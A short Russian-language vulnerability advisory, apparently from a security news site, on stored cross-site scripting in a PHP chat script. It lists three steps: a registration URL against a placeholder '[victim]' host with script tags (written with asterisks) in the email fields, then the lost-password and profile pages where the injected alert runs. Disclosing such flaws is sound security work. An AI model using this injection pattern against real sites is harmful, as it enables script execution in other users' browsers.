Действия: 

1) Регистрация:
 
http://[victim]/chat_dir/register.php?register=yes&username=OverG&email=<scr*pt>alert
("Test!")</sc*ipt>&email1=<scr*pt>alert ("Test!")</scr*pt>

2) При выполнении функции возвращения пароля CSS выполнится:
 
http://[victim]/chat_dir/login.php?option=lostpasswd&username=OverG 

3)При просмотре профиля CSS выполнится:
 
http://[victim]/chat_dir/profile.php?username=OverG

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии